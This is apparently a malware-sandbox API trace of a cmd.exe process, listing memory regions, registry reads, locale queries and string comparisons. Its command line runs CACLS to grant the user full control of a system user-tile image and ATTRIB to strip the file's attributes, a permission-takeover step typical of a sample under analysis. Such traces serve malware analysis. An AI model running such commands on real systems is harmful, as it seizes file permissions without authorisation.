region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 25140 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 25141 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 25142 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 25143 start_va = 0x2f0000 end_va = 0x3effff entry_point = 0x0 region_type = private name = "private_0x00000000002f0000" filename = "" Region: id = 25144 start_va = 0x510000 end_va = 0x51ffff entry_point = 0x0 region_type = private name = "private_0x0000000000510000" filename = "" Region: id = 25145 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 25146 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 25147 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 25148 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 25149 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 25150 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 25151 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 25152 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 25153 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 25154 start_va = 0x3f0000 end_va = 0x4b7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003f0000" filename = "" Region: id = 25155 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 25156 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 25157 start_va = 0xc0000 end_va = 0xc6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 25158 start_va = 0xd0000 end_va = 0xd1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000d0000" filename = "" Region: id = 25159 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 25160 start_va = 0xf0000 end_va = 0xf0fff entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 25161 start_va = 0x520000 end_va = 0x620fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000520000" filename = "" Region: id = 25162 start_va = 0x630000 end_va = 0x122ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000630000" filename = "" Region: id = 25163 start_va = 0x1230000 end_va = 0x1392fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001230000" filename = "" Region: id = 25164 start_va = 0x13a0000 end_va = 0x166efff entry_point = 0x13a0000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Thread: id = 457 os_tid = 0x170 [0180.130] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x24ff1c | out: lpSystemTimeAsFileTime=0x24ff1c*(dwLowDateTime=0xa0ba36e0, dwHighDateTime=0x1d440a9)) [0180.130] GetCurrentProcessId () returned 0xcf8 [0180.130] GetCurrentThreadId () returned 0x170 [0180.130] GetTickCount () returned 0x33e95 [0180.130] QueryPerformanceCounter (in: lpPerformanceCount=0x24ff14 | out: lpPerformanceCount=0x24ff14*=23691910613) returned 1 [0180.131] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0180.131] __set_app_type (_Type=0x1) [0180.131] __p__fmode () returned 0x76b331f4 [0180.131] __p__commode () returned 0x76b331fc [0180.131] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0180.131] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0180.131] GetCurrentThreadId () returned 0x170 [0180.131] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x170) returned 0x38 [0180.131] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0180.131] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0180.131] SetThreadUILanguage (LangId=0x0) returned 0x409 [0180.132] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0180.132] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x24feac | out: phkResult=0x24feac*=0x0) returned 0x2 [0180.132] VirtualQuery (in: lpAddress=0x24fee3, lpBuffer=0x24fe7c, dwLength=0x1c | out: lpBuffer=0x24fe7c*(BaseAddress=0x24f000, AllocationBase=0x150000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0180.132] VirtualQuery (in: lpAddress=0x150000, lpBuffer=0x24fe7c, dwLength=0x1c | out: lpBuffer=0x24fe7c*(BaseAddress=0x150000, AllocationBase=0x150000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0180.132] VirtualQuery (in: lpAddress=0x151000, lpBuffer=0x24fe7c, dwLength=0x1c | out: lpBuffer=0x24fe7c*(BaseAddress=0x151000, AllocationBase=0x150000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0180.132] VirtualQuery (in: lpAddress=0x153000, lpBuffer=0x24fe7c, dwLength=0x1c | out: lpBuffer=0x24fe7c*(BaseAddress=0x153000, AllocationBase=0x150000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0180.132] VirtualQuery (in: lpAddress=0x250000, lpBuffer=0x24fe7c, dwLength=0x1c | out: lpBuffer=0x24fe7c*(BaseAddress=0x250000, AllocationBase=0x0, AllocationProtect=0x0, RegionSize=0xa0000, State=0x10000, Protect=0x1, Type=0x0)) returned 0x1c [0180.132] GetConsoleOutputCP () returned 0x1b5 [0180.132] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0180.132] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0180.132] _get_osfhandle (_FileHandle=1) returned 0x7 [0180.133] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0180.133] _get_osfhandle (_FileHandle=1) returned 0x7 [0180.133] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0180.133] _get_osfhandle (_FileHandle=1) returned 0x7 [0180.133] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0180.133] _get_osfhandle (_FileHandle=0) returned 0x3 [0180.133] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0180.133] _get_osfhandle (_FileHandle=0) returned 0x3 [0180.133] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0180.133] GetEnvironmentStringsW () returned 0x300308* [0180.134] FreeEnvironmentStringsW (penv=0x300308) returned 1 [0180.134] GetEnvironmentStringsW () returned 0x300308* [0180.134] FreeEnvironmentStringsW (penv=0x300308) returned 1 [0180.134] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x24ee1c | out: phkResult=0x24ee1c*=0x40) returned 0x0 [0180.134] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x24ee24, lpData=0x24ee28, lpcbData=0x24ee20*=0x1000 | out: lpType=0x24ee24*=0x0, lpData=0x24ee28*=0xb8, lpcbData=0x24ee20*=0x1000) returned 0x2 [0180.134] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x24ee24, lpData=0x24ee28, lpcbData=0x24ee20*=0x1000 | out: lpType=0x24ee24*=0x4, lpData=0x24ee28*=0x1, lpcbData=0x24ee20*=0x4) returned 0x0 [0180.134] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x24ee24, lpData=0x24ee28, lpcbData=0x24ee20*=0x1000 | out: lpType=0x24ee24*=0x0, lpData=0x24ee28*=0x1, lpcbData=0x24ee20*=0x1000) returned 0x2 [0180.134] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x24ee24, lpData=0x24ee28, lpcbData=0x24ee20*=0x1000 | out: lpType=0x24ee24*=0x4, lpData=0x24ee28*=0x0, lpcbData=0x24ee20*=0x4) returned 0x0 [0180.134] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x24ee24, lpData=0x24ee28, lpcbData=0x24ee20*=0x1000 | out: lpType=0x24ee24*=0x4, lpData=0x24ee28*=0x40, lpcbData=0x24ee20*=0x4) returned 0x0 [0180.134] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x24ee24, lpData=0x24ee28, lpcbData=0x24ee20*=0x1000 | out: lpType=0x24ee24*=0x4, lpData=0x24ee28*=0x40, lpcbData=0x24ee20*=0x4) returned 0x0 [0180.134] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x24ee24, lpData=0x24ee28, lpcbData=0x24ee20*=0x1000 | out: lpType=0x24ee24*=0x0, lpData=0x24ee28*=0x40, lpcbData=0x24ee20*=0x1000) returned 0x2 [0180.134] RegCloseKey (hKey=0x40) returned 0x0 [0180.134] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x24ee1c | out: phkResult=0x24ee1c*=0x40) returned 0x0 [0180.134] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x24ee24, lpData=0x24ee28, lpcbData=0x24ee20*=0x1000 | out: lpType=0x24ee24*=0x0, lpData=0x24ee28*=0x40, lpcbData=0x24ee20*=0x1000) returned 0x2 [0180.134] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x24ee24, lpData=0x24ee28, lpcbData=0x24ee20*=0x1000 | out: lpType=0x24ee24*=0x4, lpData=0x24ee28*=0x1, lpcbData=0x24ee20*=0x4) returned 0x0 [0180.134] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x24ee24, lpData=0x24ee28, lpcbData=0x24ee20*=0x1000 | out: lpType=0x24ee24*=0x0, lpData=0x24ee28*=0x1, lpcbData=0x24ee20*=0x1000) returned 0x2 [0180.134] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x24ee24, lpData=0x24ee28, lpcbData=0x24ee20*=0x1000 | out: lpType=0x24ee24*=0x4, lpData=0x24ee28*=0x0, lpcbData=0x24ee20*=0x4) returned 0x0 [0180.134] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x24ee24, lpData=0x24ee28, lpcbData=0x24ee20*=0x1000 | out: lpType=0x24ee24*=0x4, lpData=0x24ee28*=0x9, lpcbData=0x24ee20*=0x4) returned 0x0 [0180.134] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x24ee24, lpData=0x24ee28, lpcbData=0x24ee20*=0x1000 | out: lpType=0x24ee24*=0x4, lpData=0x24ee28*=0x9, lpcbData=0x24ee20*=0x4) returned 0x0 [0180.134] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x24ee24, lpData=0x24ee28, lpcbData=0x24ee20*=0x1000 | out: lpType=0x24ee24*=0x0, lpData=0x24ee28*=0x9, lpcbData=0x24ee20*=0x1000) returned 0x2 [0180.134] RegCloseKey (hKey=0x40) returned 0x0 [0180.135] time (in: timer=0x0 | out: timer=0x0) returned 0x5b88638f [0180.135] srand (_Seed=0x5b88638f) [0180.135] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile13.bmp\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile13.bmp\"" [0180.135] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile13.bmp\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile13.bmp\"" [0180.135] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0180.135] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x301a68, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0180.135] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0180.135] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0180.135] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0180.135] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0180.135] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0180.135] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0180.135] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0180.135] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0180.135] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0180.135] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0180.135] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0180.135] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0180.136] GetEnvironmentStringsW () returned 0x302458* [0180.136] FreeEnvironmentStringsW (penv=0x302458) returned 1 [0180.136] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0180.136] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0180.136] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0180.136] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0180.136] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0180.136] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0180.136] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0180.136] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0180.136] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0180.136] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0180.136] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x24fbe8 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0180.136] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x24fbe8, lpFilePart=0x24fbe4 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x24fbe4*="Desktop") returned 0x18 [0180.136] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0180.136] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x24f964 | out: lpFindFileData=0x24f964) returned 0x300ae8 [0180.136] FindClose (in: hFindFile=0x300ae8 | out: hFindFile=0x300ae8) returned 1 [0180.136] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x24f964 | out: lpFindFileData=0x24f964) returned 0x300ae8 [0180.137] FindClose (in: hFindFile=0x300ae8 | out: hFindFile=0x300ae8) returned 1 [0180.137] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x24f964 | out: lpFindFileData=0x24f964) returned 0x300ae8 [0180.137] FindClose (in: hFindFile=0x300ae8 | out: hFindFile=0x300ae8) returned 1 [0180.137] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0180.137] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0180.137] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0180.137] GetEnvironmentStringsW () returned 0x300308* [0180.137] FreeEnvironmentStringsW (penv=0x300308) returned 1 [0180.137] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0180.138] GetConsoleOutputCP () returned 0x1b5 [0180.138] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0180.138] GetUserDefaultLCID () returned 0x409 [0180.138] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0180.138] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x24fd28, cchData=128 | out: lpLCData="0") returned 2 [0180.138] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x24fd28, cchData=128 | out: lpLCData="0") returned 2 [0180.138] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x24fd28, cchData=128 | out: lpLCData="1") returned 2 [0180.138] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0180.138] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0180.138] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0180.138] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0180.138] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0180.138] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0180.138] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0180.138] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0180.138] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0180.139] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0180.139] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0180.140] GetConsoleTitleW (in: lpConsoleTitle=0x2f09b8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0180.140] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0180.140] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0180.140] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0180.140] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0180.141] GetEnvironmentVariableW (in: lpName="USERNAME", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="EEBsYm5") returned 0x7 [0180.141] _wcsicmp (_String1="CACLS", _String2=")") returned 58 [0180.141] _wcsicmp (_String1="FOR", _String2="CACLS") returned 3 [0180.141] _wcsicmp (_String1="FOR/?", _String2="CACLS") returned 3 [0180.141] _wcsicmp (_String1="IF", _String2="CACLS") returned 6 [0180.141] _wcsicmp (_String1="IF/?", _String2="CACLS") returned 6 [0180.141] _wcsicmp (_String1="REM", _String2="CACLS") returned 15 [0180.141] _wcsicmp (_String1="REM/?", _String2="CACLS") returned 15 [0180.207] _wcsicmp (_String1="ATTRIB", _String2=")") returned 56 [0180.207] _wcsicmp (_String1="FOR", _String2="ATTRIB") returned 5 [0180.207] _wcsicmp (_String1="FOR/?", _String2="ATTRIB") returned 5 [0180.207] _wcsicmp (_String1="IF", _String2="ATTRIB") returned 8 [0180.207] _wcsicmp (_String1="IF/?", _String2="ATTRIB") returned 8 [0180.207] _wcsicmp (_String1="REM", _String2="ATTRIB") returned 17 [0180.207] _wcsicmp (_String1="REM/?", _String2="ATTRIB") returned 17 [0180.229] GetConsoleTitleW (in: lpConsoleTitle=0x24f9bc, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0180.229] _wcsicmp (_String1="CACLS", _String2="DIR") returned -1 [0180.229] _wcsicmp (_String1="CACLS", _String2="ERASE") returned -2 [0180.229] _wcsicmp (_String1="CACLS", _String2="DEL") returned -1 [0180.229] _wcsicmp (_String1="CACLS", _String2="TYPE") returned -17 [0180.230] _wcsicmp (_String1="CACLS", _String2="COPY") returned -14 [0180.230] _wcsicmp (_String1="CACLS", _String2="CD") returned -3 [0180.230] _wcsicmp (_String1="CACLS", _String2="CHDIR") returned -7 [0180.230] _wcsicmp (_String1="CACLS", _String2="RENAME") returned -15 [0180.230] _wcsicmp (_String1="CACLS", _String2="REN") returned -15 [0180.230] _wcsicmp (_String1="CACLS", _String2="ECHO") returned -2 [0180.230] _wcsicmp (_String1="CACLS", _String2="SET") returned -16 [0180.230] _wcsicmp (_String1="CACLS", _String2="PAUSE") returned -13 [0180.230] _wcsicmp (_String1="CACLS", _String2="DATE") returned -1 [0180.230] _wcsicmp (_String1="CACLS", _String2="TIME") returned -17 [0180.230] _wcsicmp (_String1="CACLS", _String2="PROMPT") returned -13 [0180.230] _wcsicmp (_String1="CACLS", _String2="MD") returned -10 [0180.230] _wcsicmp (_String1="CACLS", _String2="MKDIR") returned -10 [0180.230] _wcsicmp (_String1="CACLS", _String2="RD") returned -15 [0180.230] _wcsicmp (_String1="CACLS", _String2="RMDIR") returned -15 [0180.230] _wcsicmp (_String1="CACLS", _String2="PATH") returned -13 [0180.230] _wcsicmp (_String1="CACLS", _String2="GOTO") returned -4 [0180.230] _wcsicmp (_String1="CACLS", _String2="SHIFT") returned -16 [0180.230] _wcsicmp (_String1="CACLS", _String2="CLS") returned -11 [0180.230] _wcsicmp (_String1="CACLS", _String2="CALL") returned -9 [0180.230] _wcsicmp (_String1="CACLS", _String2="VERIFY") returned -19 [0180.230] _wcsicmp (_String1="CACLS", _String2="VER") returned -19 [0180.230] _wcsicmp (_String1="CACLS", _String2="VOL") returned -19 [0180.230] _wcsicmp (_String1="CACLS", _String2="EXIT") returned -2 [0180.230] _wcsicmp (_String1="CACLS", _String2="SETLOCAL") returned -16 [0180.230] _wcsicmp (_String1="CACLS", _String2="ENDLOCAL") returned -2 [0180.230] _wcsicmp (_String1="CACLS", _String2="TITLE") returned -17 [0180.230] _wcsicmp (_String1="CACLS", _String2="START") returned -16 [0180.230] _wcsicmp (_String1="CACLS", _String2="DPATH") returned -1 [0180.230] _wcsicmp (_String1="CACLS", _String2="KEYS") returned -8 [0180.230] _wcsicmp (_String1="CACLS", _String2="MOVE") returned -10 [0180.230] _wcsicmp (_String1="CACLS", _String2="PUSHD") returned -13 [0180.230] _wcsicmp (_String1="CACLS", _String2="POPD") returned -13 [0180.230] _wcsicmp (_String1="CACLS", _String2="ASSOC") returned 2 [0180.230] _wcsicmp (_String1="CACLS", _String2="FTYPE") returned -3 [0180.230] _wcsicmp (_String1="CACLS", _String2="BREAK") returned 1 [0180.230] _wcsicmp (_String1="CACLS", _String2="COLOR") returned -14 [0180.230] _wcsicmp (_String1="CACLS", _String2="MKLINK") returned -10 [0180.230] _wcsicmp (_String1="CACLS", _String2="DIR") returned -1 [0180.231] _wcsicmp (_String1="CACLS", _String2="ERASE") returned -2 [0180.231] _wcsicmp (_String1="CACLS", _String2="DEL") returned -1 [0180.231] _wcsicmp (_String1="CACLS", _String2="TYPE") returned -17 [0180.231] _wcsicmp (_String1="CACLS", _String2="COPY") returned -14 [0180.231] _wcsicmp (_String1="CACLS", _String2="CD") returned -3 [0180.231] _wcsicmp (_String1="CACLS", _String2="CHDIR") returned -7 [0180.231] _wcsicmp (_String1="CACLS", _String2="RENAME") returned -15 [0180.231] _wcsicmp (_String1="CACLS", _String2="REN") returned -15 [0180.231] _wcsicmp (_String1="CACLS", _String2="ECHO") returned -2 [0180.231] _wcsicmp (_String1="CACLS", _String2="SET") returned -16 [0180.231] _wcsicmp (_String1="CACLS", _String2="PAUSE") returned -13 [0180.231] _wcsicmp (_String1="CACLS", _String2="DATE") returned -1 [0180.231] _wcsicmp (_String1="CACLS", _String2="TIME") returned -17 [0180.231] _wcsicmp (_String1="CACLS", _String2="PROMPT") returned -13 [0180.231] _wcsicmp (_String1="CACLS", _String2="MD") returned -10 [0180.231] _wcsicmp (_String1="CACLS", _String2="MKDIR") returned -10 [0180.231] _wcsicmp (_String1="CACLS", _String2="RD") returned -15 [0180.231] _wcsicmp (_String1="CACLS", _String2="RMDIR") returned -15 [0180.231] _wcsicmp (_String1="CACLS", _String2="PATH") returned -13 [0180.231] _wcsicmp (_String1="CACLS", _String2="GOTO") returned -4 [0180.231] _wcsicmp (_String1="CACLS", _String2="SHIFT") returned -16 [0180.231] _wcsicmp (_String1="CACLS", _String2="CLS") returned -11 [0180.231] _wcsicmp (_String1="CACLS", _String2="CALL") returned -9 [0180.231] _wcsicmp (_String1="CACLS", _String2="VERIFY") returned -19 [0180.231] _wcsicmp (_String1="CACLS", _String2="VER") returned -19 [0180.231] _wcsicmp (_String1="CACLS", _String2="VOL") returned -19 [0180.231] _wcsicmp (_String1="CACLS", _String2="EXIT") returned -2 [0180.231] _wcsicmp (_String1="CACLS", _String2="SETLOCAL") returned -16 [0180.231] _wcsicmp (_String1="CACLS", _String2="ENDLOCAL") returned -2 [0180.231] _wcsicmp (_String1="CACLS", _String2="TITLE") returned -17 [0180.231] _wcsicmp (_String1="CACLS", _String2="START") returned -16 [0180.231] _wcsicmp (_String1="CACLS", _String2="DPATH") returned -1 [0180.231] _wcsicmp (_String1="CACLS", _String2="KEYS") returned -8 [0180.231] _wcsicmp (_String1="CACLS", _String2="MOVE") returned -10 